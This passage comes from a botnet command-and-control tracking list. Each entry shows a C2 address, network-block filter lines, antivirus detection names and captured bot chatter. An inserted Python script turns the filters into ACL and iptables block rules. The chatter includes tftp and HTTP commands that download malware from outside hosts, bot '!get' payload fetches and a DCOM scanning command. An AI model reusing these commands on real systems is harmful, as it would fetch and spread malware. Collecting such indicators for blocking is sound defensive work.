- Client: USERHOST P|a6xnr2frjMODE P|a6xnr2frj JOIN #mm RSA
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | IRCBot.Gen |
| AntiVir | TRATRAPS.Gen |
| Authentium | MISSED |
| Avast | _DCom-F |
| AVG | SHeur2.BBMT |
| BitDefender | Generic.Mydoom.638E6D7B |
| CAT-QuickHeal | I-Kolabc.gza |
| ClamAV | MISSED |
| DrWeb | HLLW.Piabot.4 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Kolabc.GZA!im |
| F-Prot | MISSED |
| F-Secure | Kolabc.gza |
| Ikarus | Kolabc |
| Kaspersky | Kolabc.gza |
| McAfee | MISSED |
| Microsoft | Kolabc.C |
| NOD32v2 | MISSED |
| Norman | Akbot.BJT |
| Panda | Gaobot.OXI.worm |
| Prevx1 | MISSED |
| Rising | Dropper.Undef.GEN |
| Sophos | MalBehav-104 |
| Sunbelt | Generic!BT |
| Symantec | Spybot.Worm |
| TheHacker | MISSED |
| TrendMicro | KOLABC.GB |
| VBA32 | Kolabc.gza |
| VirusBuster | RBot.Gen.3 |
| Webwasher Gateway | MISSED |
Priority: 9
TCP Ports: 10324
Filter: deny ip host 67.43.236.67 any log ! 9 infects 08/17/09 to 12/28/09 -
ISP: nader dara
Clients: 9
Country: lebanon
Domain: -
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 194.126.184.69 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 194.126.184.69 get dllhost.exe wins\DLLHOST.EXE
- Client: USER oqrpxi oqrpxi oqrpxi :uwcnesiidwfjpyko
- Client: NICK gEJwHkFa
- Client: MODE gEJwHkFa +xi
- Client: GET /rs3.exe HTTP/1.0Host: nadsamcabran12.com
- Client: JOIN #las6 USERHOST gEJwHkFaMODE #m +smntuPRIVMSG #m...
- Client: MODE #las6 +smntu
- Server: :hub.20582.com 482 gEJwHkFa #las6 :You're not channel operator
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | IRCBot.variant |
| AntiVir | VanBot.AX.116 |
| Authentium | MISSED |
| Avast | _SdBot-4142 |
| AVG | Generic_c.VB |
| BitDefender | Agent.YRG |
| CAT-QuickHeal | VanBot.ax |
| ClamAV | PUA.Packed.Expressor |
| DrWeb | IRC.Sdbot.945 |
| eSafe | VanBot.ax |
| eTrust-Vet | Linkbot.OC |
| Ewido | VanBot.ax |
| FileAdvisor | MISSED |
| Fortinet | VanBot.AX!tr.bdr |
| F-Prot | MISSED |
| F-Secure | VanBot.ax |
| Ikarus | Agent.YRG |
| Kaspersky | VanBot.ax |
| McAfee | MISSED |
| Microsoft | Exploit_MS06040.gen |
| NOD32v2 | MISSED |
| Norman | Hupigon.gen83 |
| Panda | RXBot.AB.worm |
| Prevx1 | MISSED |
| Rising | IRCbot.fbi |
| Sophos | MISSED |
| Sunbelt | Agent.YRG |
| Symantec | IRCbot |
| TheHacker | BackdoorVanBot.ax |
| TrendMicro | MISSED |
| VBA32 | VanBot.ax |
| VirusBuster | RBot.ONM |
| Webwasher Gateway | VanBot.AX.116 |
Priority: 8
TCP Ports: 3305
Filter: deny ip host 212.54.2.171 any log ! 8 infects 10/30/09 to 12/28/09 megabaud.fi
ISP: elisa oyj
Clients: 8
Country: finland
Domain: megabaud.fi
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 202.157.56.125 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 202.157.56.125 get dllhost.exe wins\DLLHOST.EXE
- Client: PASS secretpass
- Client: NICK P|nold11864USER zspnyxd3k * 0 :USA|2K|633
- Server: :hub.35869.net 001 P|nold11864...
- Client: USERHOST P|nold11864
- Server: :hub.35869.net 302 P|nold11864...
- Client: USERHOST P|nold11864MODE P|nold11864 JOIN #mm RSA
- Client: PRIVMSG #mm...
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | IRCBot.variant |
| AntiVir | TRDropper.Gen |
| Authentium | Threat-HLLIYE!Eldorado |
| Avast | _DCom-F |
| AVG | Heur |
| BitDefender | Packer.Yoda.A |
| CAT-QuickHeal | IRCBot.idc |
| ClamAV | MISSED |
| DrWeb | HLLW.Piabot |
| eSafe | TRDropper |
| eTrust-Vet | IRCBot.KU |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | PossibleThreat |
| F-Prot | Threat-HLLIYE!Eldorado |
| F-Secure | IRCBot.idc |
| Ikarus | Exploit.MS06040 |
| Kaspersky | IRCBot.idc |
| McAfee | MISSED |
| Microsoft | Exploit_MS06040.gen |
| NOD32v2 | MISSED |
| Norman | Smalltroj.MTNE |
| Panda | Gaobot.OXI.worm |
| Prevx1 | MISSED |
| Rising | MS06-040.b |
| Sophos | MalPacker |
| Sunbelt | Wootbot.gen |
| Symantec | Spybot.Worm |
| TheHacker | BackdoorIRCBot.idc |
| TrendMicro | TROJ_LSADCOM.MCL |
| VBA32 | Kolabc.gco |
| VirusBuster | IRCBot.AAWX |
| Webwasher Gateway | MISSED |
Priority: 8
TCP Ports: 65520
Filter: deny ip host 122.195.190.197 any log ! 8 infects 12/30/09 to 01/07/10 canadian-solar.com
ISP: china unicom jiangsu province network
Clients: 8
Country: china
Domain: canadian-solar.com
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 70.184.248.143 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 70.184.248.143 get dllhost.exe wins\DLLHOST.EXE
- Client: NICK ynqsvhnjUSER r020500 . . :-
- Client: Service Pack 2JOIN &virtu
- Server: :u. PRIVMSG ynqsvhnj :!get http:/www.liagand.cn/img/unpr.gif:u...
- Client: GET /img/unpr.gif HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /erdown.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /pk/pw1022.exe HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /p0905/2.0/d.bin?js02679582 HTTP/1.0Accept: */*User-Agent:...
- Server: GET /portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
- Server: GET /portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
- Server: GET /p1022/2.0/ms.bin?js0241037 HTTP/1.0Accept: */*User-Agent:...
- Server: PONG :i.
- Client: JOIN &virtu
- Server: PONG :i.
- Client: JOIN &virtu
- Server: PONG :i.
- Client: JOIN &virtu
more....
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |

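Every entry on this list carries a Cisco-style filter line (deny ip host X any log, with everything after the "!" being an IOS comment). The script below is an added example, not the list's own tooling: it parses those lines into records, refuses any address that is not globally routable (the chatter shows bot-side RFC 1918 addresses such as 192.168.1.172, which must never land in an edge ACL), applies an age window, and emits both a Cisco extended ACL and iptables rules for both traffic directions. The sample filter lines are copied from entries on this page plus one constructed bad entry; the reference date, the 30-day window, the ACL name and the chain name are assumptions of mine and do not reproduce the page's own 10-day/30-day set membership.

```python
"""Turn this list's "Filter deny ip host ..." lines into block rules.

Added example; not the list's own tooling.  The filter lines below are
copied from entries on this page (plus one constructed bad entry); the
reference date, age window, ACL name and chain name are assumptions.
"""
import ipaddress
import re
from datetime import date, timedelta

SAMPLE_FILTERS = [
    # Copied from this page.  Everything after "!" is an IOS comment.
    "Filter deny ip host 122.195.190.197 any log ! 8 infects 12/30/09 to 01/07/10 canadian-solar.com",
    "Filter deny ip host 83.133.119.206 any log ! 7 infects 02/06/10 to 02/08/10 greatnet.de",
    "Filter deny ip host 204.45.13.42 any log ! 1 infects 01/06/10 to 01/06/10 -",
    # Constructed: an RFC 1918 address like the bot-side 192.168.x.x seen in the
    # chatter.  It must be rejected before it reaches an edge ACL.
    "Filter deny ip host 192.168.1.172 any log ! 3 infects 01/01/10 to 01/02/10 -",
]

FILTER_RE = re.compile(
    r"^(?:Filter\s+)?deny ip host (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) any log\s*!\s*"
    r"(?P<infects>\d+) infects (?P<first>\d\d/\d\d/\d\d) to (?P<last>\d\d/\d\d/\d\d)"
    r"(?:\s+(?P<domain>\S+))?\s*$"
)


def _mmddyy(text):
    """The list writes dates as MM/DD/YY; all entries are 2009/2010."""
    m, d, y = (int(part) for part in text.split("/"))
    return date(2000 + y, m, d)


def parse_filter(line):
    """Return one record (dict) for a filter line, or None if it does not parse."""
    m = FILTER_RE.match(line.strip())
    if not m:
        return None
    domain = m.group("domain")
    return {
        "ip": m.group("ip"),
        "infects": int(m.group("infects")),
        "first_seen": _mmddyy(m.group("first")),
        "last_seen": _mmddyy(m.group("last")),
        "domain": None if domain in (None, "-") else domain,
    }


def is_routable(ip):
    """True only for globally routable unicast; private, loopback, link-local,
    multicast and reserved space are refused so a bad row cannot blackhole a LAN."""
    return ipaddress.ip_address(ip).is_global


def select(records, as_of_iso, max_age_days):
    """Keep routable C2s whose last sighting is within max_age_days of as_of_iso."""
    cutoff = date.fromisoformat(as_of_iso) - timedelta(days=max_age_days)
    return [r for r in records if is_routable(r["ip"]) and r["last_seen"] >= cutoff]


def ios_acl(records, name="BOTNET-C2"):
    """Cisco IOS extended ACL.  The page's 'deny ip host X any' only matches
    packets *sourced* from the C2; the mirror line is needed to stop the bots'
    own outbound connections, whichever direction the ACL is applied in."""
    lines = [f"ip access-list extended {name}"]
    for r in records:
        lines.append(f" ! {r['infects']} infects, last seen {r['last_seen'].isoformat()}, {r['domain'] or '-'}")
        lines.append(f" deny ip host {r['ip']} any log")
        lines.append(f" deny ip any host {r['ip']} log")
    lines.append(" permit ip any any")  # explicit, so the ACL does not drop everything else
    return lines


def iptables_rules(records, chain="BOTNET_C2"):
    """Equivalent netfilter rules: log, then drop, in both directions."""
    lines = [f"iptables -N {chain}"]
    for r in records:
        for flag, tag in (("-s", "C2-IN"), ("-d", "C2-OUT")):
            lines.append(f"iptables -A {chain} {flag} {r['ip']} -j LOG --log-prefix '{tag} '")
            lines.append(f"iptables -A {chain} {flag} {r['ip']} -j DROP")
    return lines


if __name__ == "__main__":
    recs = [r for r in map(parse_filter, SAMPLE_FILTERS) if r]
    # Assumed reference date (the page header's Tue Feb 9 2010) and a 30-day window.
    for line in ios_acl(select(recs, "2010-02-09", 30)):
        print(line)
```

Two caveats before deploying anything generated this way. First, the page's filter only matches packets sourced from the C2 address, so an ACL applied outbound on the edge would not stop the bots' own connections; the mirror line above covers that. Second, two entries on this page (82.98.86.170, ISP "sedo domain parking", and 68.178.232.100, secureserver.net at GoDaddy) show parked-domain page fetches in their chatter rather than bot commands, and every antivirus row for them reads MISSED; blocking shared domain-parking servers breaks unrelated domains, so review entries with that profile by hand rather than pushing the whole list.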
Priority: 8
TCP Ports: 65520
91
Filter: deny ip host 91.212.220.156 any log ! 8 infects 08/23/09 to 09/07/09 -
ISP: group vertical ltd
Clients: 8
Country: russian federation
Domain: -
Activity:
Chatter Example
- Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host:...
- Client: NICK dtugkmbeUSER i020501 . . :-
- Client: JOIN &virtu
- Server: :k. PRIVMSG dtugkmbe :!get http:/gidromash.cn/oc/box.txt
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: NICK jddwnomeUSER n020501 . . :-
- Client: JOIN &virtu
- Server: :l. PRIVMSG jddwnome :!get http:/gidromash.cn/oc/box.txt
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut.B |
| AntiVir | Virut.AX |
| Authentium | Korgo.V |
| Avast | _Virtob |
| AVG | Korgo.A |
| BitDefender | Padobot.BV.Dam |
| CAT-QuickHeal | Virut.Z |
| ClamAV | Virut-54 |
| DrWeb | Lsabot |
| eSafe | MISSED |
| eTrust-Vet | Virut.7115 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Virut.AV |
| F-Prot | Korgo.V |
| F-Secure | MISSED |
| Ikarus | Padobot.M |
| Kaspersky | Padobot.m |
| McAfee | Virut.gen.a |
| Microsoft | Korgo.V |
| NOD32v2 | MISSED |
| Norman | Korgo.V |
| Panda | Virutas.FG |
| Prevx1 | MISSED |
| Rising | Virut.an |
| Sophos | Virut-W |
| Sunbelt | MISSED |
| Symantec | Virut.W |
| TheHacker | Virut.av |
| TrendMicro | PE_VIRUT.AV |
| VBA32 | Virut.2 |
| VirusBuster | Padobot.D |
| Webwasher Gateway | MISSED |

Priority: 7
TCP Ports: 65520
Filter: deny ip host 221.5.74.39 any log ! 7 infects 08/13/09 to 08/17/09 cncnet.net
ISP: china unicom guangdong province network
Clients: 7
Country: china
Domain: cncnet.net
Activity:
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 222.234.215.213 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 222.234.215.213 get dllhost.exe wins\DLLHOST.EXE
- Client: NICK jdhsdjqxUSER p020501 . . :-
- Client: JOIN &virtu
- Server: :j. PRIVMSG jdhsdjqx :!get http:/dretis.cn/oc/box.txt
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut.D |
| AntiVir | Virut.Gen |
| Authentium | Virut.9264 |
| Avast | _Virut |
| AVG | Virut |
| BitDefender | Virtob.3.Gen |
| CAT-QuickHeal | Virut.D |
| ClamAV | Virut.ca |
| DrWeb | Virut.5 |
| eSafe | MISSED |
| eTrust-Vet | Virut.9276 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MetaCrypt.5 |
| F-Prot | Virut.9264 |
| F-Secure | Virut.n |
| Ikarus | Virut.d |
| Kaspersky | Virut.n |
| McAfee | Virut.gen |
| Microsoft | Virut.AK |
| NOD32v2 | Virut.E |
| Norman | Virut.D |
| Panda | Virutas.gen |
| Prevx1 | MISSED |
| Rising | Virut.GEN |
| Sophos | Virut-L |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | Virut.gen |
| TrendMicro | PE_VIRUT.D-2 |
| VBA32 | Virut.3 |
| VirusBuster | Virut.Gen |
| Webwasher Gateway | Virut.Gen |

Priority: 7
TCP Ports: 3305
Filter: deny ip host 211.233.45.253 any log ! 7 infects 09/01/09 to 09/08/09 kidc.net
ISP: korea internet data center inc
Clients: 7
Country: korea, republic of
Domain: kidc.net
Activity:
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 96.8.226.33 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 96.8.226.33 get dllhost.exe wins\DLLHOST.EXE
- Client: PASS secretpass
- Client: NICK P|tyz4nprpcUSER v7sfuv623 * 0 :USA|XP|126
- Server: :hub.49523.net 001 P|tyz4nprpc...
- Client: USERHOST P|tyz4nprpc
- Server: :hub.49523.net 302 P|tyz4nprpc...
- Client: USERHOST P|tyz4nprpcMODE P|tyz4nprpc JOIN #mm RSA
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | TRDropper.Gen |
| Authentium | Threat-HLLIYE!Eldorado |
| Avast | _DCom-F |
| AVG | Heur |
| BitDefender | Packer.Yoda.A |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | HLLW.Piabot.4 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | Threat-HLLIYE!Eldorado |
| F-Secure | MISSED |
| Ikarus | Exploit.MS06040 |
| Kaspersky | Heur.Generic |
| McAfee | MISSED |
| Microsoft | Exploit_MS06040.gen |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | TrjCI.A |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalPacker |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | PAK_Generic.001 |
| VBA32 | MISSED |
| VirusBuster | PackedYoda |
| Webwasher Gateway | MISSED |

Priority: 7
TCP Ports: 65520
Filter: deny ip host 83.133.119.206 any log ! 7 infects 02/06/10 to 02/08/10 greatnet.de
ISP: lncde-greatnet-newmedia
Clients: 7
Country: germany
Domain: greatnet.de
Activity:
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 116.126.215.24 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 116.126.215.24 get dllhost.exe wins\DLLHOST.EXE
- Client: NICK lcntiouuUSER c020501 . . :_
- Client: JOIN &virtu
- Server: :u. PRIVMSG lcntiouu :!get...
- Client: GET /build/setup10.exe HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /op/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
- Server: GET /bt4/fout.php HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | Siggen.49592 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | Cryptor |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | Suspicious.Insight |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |

Priority: 6
TCP Ports: 3305
Filter: deny ip host 61.120.62.28 any log ! 6 infects 08/13/09 to 08/22/09 dion.ne.jp
ISP: rabby_s inc
Clients: 6
Country: japan
Domain: dion.ne.jp
Activity:
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 173.22.150.5 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 173.22.150.5 get dllhost.exe wins\DLLHOST.EXE
- Client: PASS secretpass
- Client: NICK P|zr9eaoxa1USER dejgzufxb * 0 :USA|XP|577
- Server: :hub.10842.net 001 P|zr9eaoxa1...
- Client: USERHOST P|zr9eaoxa1
- Server: :hub.10842.net 302 P|zr9eaoxa1...
- Client: USERHOST P|zr9eaoxa1MODE P|zr9eaoxa1 JOIN #mm RSA
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | IRCBot.Gen |
| AntiVir | TRATRAPS.Gen |
| Authentium | MISSED |
| Avast | _DCom-F |
| AVG | SHeur2.AOLW |
| BitDefender | Generic.Mydoom.F72197F1 |
| CAT-QuickHeal | Agent.gen |
| ClamAV | MISSED |
| DrWeb | HLLW.Piabot.origin |
| eSafe | MISSED |
| eTrust-Vet | IRCBot.PJ |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Kolabc.gza |
| Ikarus | Exploit.MS06040 |
| Kaspersky | Kolabc.gza |
| McAfee | Spybot.worm!l |
| Microsoft | Exploit_MS06040.gen |
| NOD32v2 | MISSED |
| Norman | Atraps.MQB |
| Panda | TrjCI.A |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalBehav-004 |
| Sunbelt | MISSED |
| Symantec | Spybot.Worm |
| TheHacker | MISSED |
| TrendMicro | SPYBOT.BIM |
| VBA32 | MISSED |
| VirusBuster | RBot.Gen.3 |
| Webwasher Gateway | MISSED |

Priority: 6
TCP Ports: 80
Filter: deny ip host 82.98.86.170 any log ! 6 infects 08/22/09 to 11/08/09 fhe3rz.net
ISP: sedo domain parking
Clients: 6
Country: germany
Domain: fhe3rz.net
Activity:
Chatter Example
- Client: GET /xxxxxxx HTTP/1.0User-Agent: bHost: 203.180.17.238
- Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
- Server: GET...
- Server: GET /css/724/landing/en.css HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/body_bg.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/td_bg.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/container_bg.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/keywords_bg.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/bullet.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/pop_cat_top.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/searchtext_bg.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/search.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/footer_bg.jpg HTTP/1.0Accept: */*Referer:...
- Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
- Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Korgo.46592 |
| AntiVir | Padobot.Z.2 |
| Authentium | Berbew.M |
| Avast | _Padobot-I |
| AVG | Generic7.ORM |
| BitDefender | Generic.208542 |
| CAT-QuickHeal | I-Padobot.z |
| ClamAV | Korgo.Z |
| DrWeb | HangUp.26 |
| eSafe | MISSED |
| eTrust-Vet | Berkor.A |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | Berbew.M |
| F-Secure | Padobot.z |
| Ikarus | Padobot.Z |
| Kaspersky | Padobot.z |
| McAfee | MISSED |
| Microsoft | Berbew.BE!dam |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | Berbew.d |
| Sophos | Doxpar-C |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | BKDR_BERBEW.Q |
| VBA32 | Padobot.z |
| VirusBuster | Padobot.B |
| Webwasher Gateway | MISSED |

Priority: 5
TCP Ports: 8080
72
Filter: deny ip host 67.43.236.66 any log ! 5 infects 08/13/09 to 10/02/09 -
ISP: nader dara
Clients: 5
Country: lebanon
Domain: -
Activity:
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 24.103.196.250 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 24.103.196.250 get dllhost.exe wins\DLLHOST.EXE
- Client: USER iqelkq iqelkq iqelkq :rjrximinlwihoahg
- Client: NICK RODhbJxT
- Client: MODE RODhbJxT +xi
- Client: JOIN #las6 USERHOST RODhbJxTMODE #m +smntuPRIVMSG #m...
- Client: GET /rs3.exe HTTP/1.0Host: nadsamcabran12.com
- Client: MODE #las6 +smntu
- Server: :hub.20582.com 482 RODhbJxT #las6 :You're not channel operator
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: :eh!Y@hoo.net PRIVMSG #las6 :* ipscan s.s.s.s dcom2 -sERROR...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut |
| AntiVir | Virut.AT |
| Authentium | Virut.AG |
| Avast | _Virtob |
| AVG | RBot.KB |
| BitDefender | IRC-Generic.3619 |
| CAT-QuickHeal | Virut.Y |
| ClamAV | Small-4287 |
| DrWeb | IRC.Sdbot.2665 |
| eSafe | TRCrypt.nspm |
| eTrust-Vet | Virut.6640 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Nepoe.EM!tr.bdr |
| F-Prot | Virut.AG |
| F-Secure | Nepoe.em |
| Ikarus | MISSED |
| Kaspersky | Nepoe.em |
| McAfee | Virut.gen.a |
| Microsoft | Virut.AA |
| NOD32v2 | MISSED |
| Norman | Virut.AH |
| Panda | Virutas.AH |
| Prevx1 | MISSED |
| Rising | Virut.al |
| Sophos | Virut-Gen |
| Sunbelt | MISSED |
| Symantec | Virut.W |
| TheHacker | Virut.genS |
| TrendMicro | PE_VIRUT.AT |
| VBA32 | Nepoe.em |
| VirusBuster | PoeBot.OB |
| Webwasher Gateway | MISSED |

Priority: 5
TCP Ports: 8080 8080
67
Filter: deny ip host 72.10.172.211 any log ! 5 infects 08/17/09 to 10/16/09 gtcomm.net
ISP: globotech communications
Clients: 5
Country: canada
Domain: gtcomm.net
Activity:
Chatter Example
- Client: dir dllcache\tftpd.exe
- Client: tftp -i 24.103.196.250 get svchost.exe wins\SVCHOST.EXE
- Client: tftp -i 24.103.196.250 get dllhost.exe wins\DLLHOST.EXE
- Client: USER jseabq jseabq jseabq :dqhawgsvzjhxsrsm
- Client: NICK ErEDHMyl
- Client: MODE ErEDHMyl +xi
- Client: GET /rs3.exe HTTP/1.0Host: idfc.info
- Server: GET /f.exe HTTP/1.0Host: idfc.info
- Client: JOIN #las6 USERHOST ErEDHMylMODE #m +smntuPRIVMSG #m...
- Client: MODE #las6 +smntu
- Server: :hub.20582.com 482 ErEDHMyl #las6 :You're not channel operator
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut |
| AntiVir | Virut.AT |
| Authentium | Virut.AG |
| Avast | _Virtob |
| AVG | RBot.KB |
| BitDefender | IRC-Generic.3619 |
| CAT-QuickHeal | Virut.Y |
| ClamAV | Small-4287 |
| DrWeb | IRC.Sdbot.2665 |
| eSafe | TRCrypt.nspm |
| eTrust-Vet | Virut.6640 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Nepoe.EM!tr.bdr |
| F-Prot | Virut.AG |
| F-Secure | Nepoe.em |
| Ikarus | MISSED |
| Kaspersky | Nepoe.em |
| McAfee | Virut.gen.a |
| Microsoft | Virut.AA |
| NOD32v2 | MISSED |
| Norman | Virut.AH |
| Panda | Virutas.AH |
| Prevx1 | MISSED |
| Rising | Virut.al |
| Sophos | Virut-Gen |
| Sunbelt | MISSED |
| Symantec | Virut.W |
| TheHacker | Virut.genS |
| TrendMicro | PE_VIRUT.AT |
| VBA32 | Nepoe.em |
| VirusBuster | PoeBot.OB |
| Webwasher Gateway | MISSED |

Priority: 5
TCP Ports: 65520 65520
216
Filter: deny ip host 218.93.205.24 any log ! 5 infects 08/13/09 to 08/14/09 163data.com.cn
ISP: chinanet jiangsu province network
Clients: 5
Country: china
Domain: 163data.com.cn
Activity:
Chatter Example
- Server: PONG :j.
- Client: JOIN &virtu
- Client: POST...
- Server: NICK ibeffknfUSER v020500 . . :_
- Client: Service Pack 2JOIN &virtu
- Server: PONG :i.
- Client: JOIN &virtu
- Server: PONG :i.
- Client: JOIN &virtu
- Server: PONG :i.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |

Priority: 4
TCP Ports: 65520 65520
216
Filter: deny ip host 218.93.205.23 any log ! 4 infects 08/19/09 to 08/20/09 163data.com.cn
ISP: chinanet jiangsu province network
Clients: 4
Country: china
Domain: 163data.com.cn
Activity:
Chatter Example
